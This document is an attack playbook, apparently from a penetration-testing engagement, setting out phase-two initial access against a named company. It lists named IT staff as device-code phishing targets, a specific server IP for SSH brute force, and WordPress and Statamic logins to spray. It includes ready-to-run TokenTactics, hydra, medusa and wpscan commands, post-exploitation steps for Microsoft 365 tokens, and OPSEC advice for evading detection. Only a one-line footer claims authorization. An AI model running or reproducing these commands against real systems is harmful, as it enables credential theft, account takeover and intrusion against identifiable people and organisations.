# PHASE 2 ATTACK PLAYBOOK
# Operation AD - wearesocial.com
# Date: 2026-01-23
# Classification: CONFIDENTIAL

================================================================================
                        EXECUTIVE SUMMARY
================================================================================

After 3 weeks of reconnaissance, we have validated 6 active attack vectors and 
eliminated 9 non-viable vectors. This playbook documents the execution plan for
Phase 2: Initial Access & Foothold.

PRIMARY OBJECTIVE: Gain initial access to wearesocial.com network
SECONDARY OBJECTIVE: Establish persistence for lateral movement
SUCCESS CRITERIA: At least 1 valid credential or session token captured

================================================================================
                        ATTACK PRIORITY MATRIX
================================================================================

| Priority | Vector                    | Success Rate | Effort | Detection Risk |
|----------|---------------------------|--------------|--------|----------------|
| 1        | M365 Device Code Phishing | 70%          | LOW    | LOW            |
| 2        | SSH Brute Force           | 50%          | LOW    | MEDIUM         |
| 3        | WordPress XML-RPC Brute   | 45%          | LOW    | MEDIUM         |
| 4        | WordPress wp-login Spray  | 40%          | LOW    | MEDIUM         |
| 5        | Statamic Login Brute      | 30%          | LOW    | MEDIUM         |
| 6        | 1Password SCIM Bridge     | 25%          | HIGH   | LOW            |

================================================================================
                        ATTACK 1: M365 DEVICE CODE PHISHING
================================================================================

## Overview
Device code phishing exploits Microsoft's OAuth 2.0 device authorization grant.
Users authenticate on legitimate Microsoft page, granting attacker access tokens.

## Targets (Priority Order)
1. david.whybrow@wearesocial.com (IT Director)
2. simone.scremin@wearesocial.com (Technology Director)
3. tobias.hall@wearesocial.com (Global Systems Manager)
4. neil.lee@wearesocial.com (Senior Systems Manager)
5. jimmy.reilly@wearesocial.com (Senior IT Support)

## Execution Commands

### Step 1: Setup TokenTactics
```powershell
git clone https://github.com/rvrsh3ll/TokenTactics.git
Import-Module ./TokenTactics/TokenTactics.psd1
```

### Step 2: Generate Device Code
```powershell
Get-AzureToken -Client MSGraph
# Note the user_code (e.g., CKDZ2BURF)
```

### Step 3: Send Phishing Email (within 15 minutes)
# Use template: recon/week3/day3/phishing-template-it-verification.html
# Replace {{DEVICE_CODE}} with user_code

### Step 4: Alternative - Python Script
```bash
python3 recon/week3/day3/token_poller.py david.whybrow@wearesocial.com
```

### Step 5: Post-Exploitation (on success)
```powershell
# Access SharePoint
Invoke-RefreshToMSGraphToken -domain wearesocial.com -refreshToken $response.refresh_token

# Dump Teams messages
Invoke-RefreshToMSTeamsToken -refreshToken $response.refresh_token

# Access OneDrive
$headers = @{Authorization = "Bearer $($response.access_token)"}
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me/drive/root/children" -Headers $headers
```

## Timing
- Best time: Tuesday-Thursday, 9AM-12PM GMT
- Device codes expire in 15 minutes
- Send emails immediately after generating code

## Fallback
If no response after 2 waves (10 targets), proceed to Attack 2.

================================================================================
                        ATTACK 2: SSH BRUTE FORCE
================================================================================

## Overview
OpenSSH 7.6p1 on mail server vulnerable to CVE-2018-15473 (username enumeration).
7 valid users already confirmed.

## Target
Host: 51.178.16.62:2832 (OVH France email server)
OS: Ubuntu (likely 18.04 LTS)

## Valid Users (from Day 2 enumeration)
- root
- mail
- ubuntu
- admin
- support
- postfix
- dovecot

## Execution Commands

### Hydra SSH Brute Force
```bash
# Quick test with common passwords
hydra -L /home/samir/custom_folders_backup/jobs/2026-op/recon/week3/day3/mysql-users.txt \
      -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
      ssh://51.178.16.62:2832 -t 4 -V -f

# Targeted attack on known users
hydra -l root -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
      ssh://51.178.16.62:2832 -t 4 -V -f
```

### Medusa Alternative
```bash
medusa -h 51.178.16.62 -n 2832 -u root \
       -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
       -M ssh -t 4
```

## Fallback
If SSH brute force fails, proceed to Attack 3.

================================================================================
                        ATTACK 3: WORDPRESS XML-RPC BRUTE FORCE
================================================================================

## Overview
WordPress XML-RPC enabled with system.multicall for amplified brute force.
No rate limiting detected.

## Target
URL: https://socialconstructdigital.com
User: admin (confirmed via REST API)
Endpoint: /xmlrpc.php

## Execution Commands

### WPScan Brute Force
```bash
# Phase 1: Custom passwords
wpscan --url https://socialconstructdigital.com \
       --usernames admin \
       --passwords /home/samir/custom_folders_backup/jobs/2026-op/recon/week3/day3/wp-custom-passwords.txt \
       --api-token c7s1vKrYbP07o0nxGcNVfw72O1JKdZzJgZLlKgG3mak

# Phase 2: Common passwords
wpscan --url https://socialconstructdigital.com \
       --usernames admin \
       --passwords /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
       --api-token c7s1vKrYbP07o0nxGcNVfw72O1JKdZzJgZLlKgG3mak
```

### XML-RPC Manual Test
```bash
curl -s -X POST https://socialconstructdigital.com/xmlrpc.php \
     -d '<?xml version="1.0"?>
         <methodCall>
           <methodName>wp.getUsersBlogs</methodName>
           <params>
             <param><value>admin</value></param>
             <param><value>PASSWORD_TO_TEST</value></param>
           </params>
         </methodCall>'
```

## Fallback
If WordPress brute force fails, proceed to Attack 4 (wp-login) or Attack 5.

================================================================================
                        ATTACK 4: WORDPRESS WP-LOGIN SPRAY
================================================================================

## Execution Commands
```bash
# Hydra wp-login
hydra -l admin \
      -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
      socialconstructdigital.com https-post-form \
      "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect" \
      -t 4 -V
```

================================================================================
                        ATTACK 5: STATAMIC LOGIN BRUTE FORCE
================================================================================

## Target
URL: https://justlaunched.wearesocial.com/cp/auth/login

## Execution Commands
```bash
# Identify login parameters first
curl -s https://justlaunched.wearesocial.com/cp/auth/login | grep -i "name="

# Hydra (adjust form parameters as needed)
hydra -l admin \
      -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
      justlaunched.wearesocial.com https-post-form \
      "/cp/auth/login:email=^USER^&password=^PASS^:Invalid" \
      -t 4 -V
```

================================================================================
                        ATTACK 6: 1PASSWORD SCIM BRIDGE
================================================================================

## Overview
If SCIM token discovered during post-exploitation, access to password vault.

## Target
URL: opscimbridge.wearesocial.com
Endpoint: /app/

## Prerequisites
- SCIM bearer token (search compromised systems for this)

## Execution (if token found)
```bash
curl -H "Authorization: Bearer SCIM_TOKEN" \
     https://opscimbridge.wearesocial.com/scim/v2/Users
```

================================================================================
                        EXECUTION SCHEDULE (Week 4)
================================================================================

MONDAY:
- AM: Setup phishing infrastructure, configure TokenTactics
- PM: Test phishing email delivery

TUESDAY:
- 9AM GMT: Send Wave 1 phishing (5 targets)
- Parallel: Begin SSH brute force
- Monitor for token captures

WEDNESDAY:
- 9AM GMT: Send Wave 2 phishing (if Wave 1 fails)
- Continue SSH brute force
- Begin WordPress brute force

THURSDAY:
- Evaluate results
- Escalate successful vectors
- Document findings

FRIDAY:
- Credential validation
- Initial foothold establishment
- Prepare for Week 5 exploitation

================================================================================
                        SUCCESS INDICATORS
================================================================================

[ ] Access token captured via device code phishing
[ ] Refresh token obtained (1-year persistence)
[ ] SSH credentials discovered
[ ] WordPress admin access gained
[ ] Statamic CMS admin access gained
[ ] SCIM token discovered

================================================================================
                        FALLBACK PLAN
================================================================================

If all vectors fail by end of Week 4:
1. Extend phishing to non-IT targets (marketing, HR)
2. Research additional web application vulnerabilities
3. Consider physical attack vectors (if in scope)
4. Revisit eliminated vectors with new information

================================================================================
                        OPSEC NOTES
================================================================================

1. Use Mullvad VPN with kill switch enabled
2. Rotate VPN servers between attack vectors
3. Rate limit brute force attempts (4 threads max)
4. Monitor for account lockout responses
5. Document all activities with timestamps
6. Maintain separate infrastructure for phishing vs scanning

================================================================================
                        FILES & RESOURCES
================================================================================

Phishing Template: recon/week3/day3/phishing-template-it-verification.html
Token Poller Script: recon/week3/day3/token_poller.py
M365 Setup Guide: recon/week3/day3/m365-phishing-setup.txt
MySQL Brute Setup: recon/week3/day3/mysql-bruteforce-setup.txt
WordPress Setup: recon/week3/day3/wordpress-spray-setup.txt
Custom Passwords: recon/week3/day3/wp-custom-passwords.txt
Eliminated Vectors: recon/week3/day4/eliminated-vectors-report.txt

================================================================================
                        CONTACTS & REPORTING
================================================================================

Daily updates to engagement lead
Weekly report compilation
Immediate escalation on successful compromise

================================================================================
                        LEGAL & COMPLIANCE
================================================================================

This playbook is authorized under the signed Statement of Work.
All activities must remain within defined scope boundaries.
Report any scope violations immediately.

================================================================================
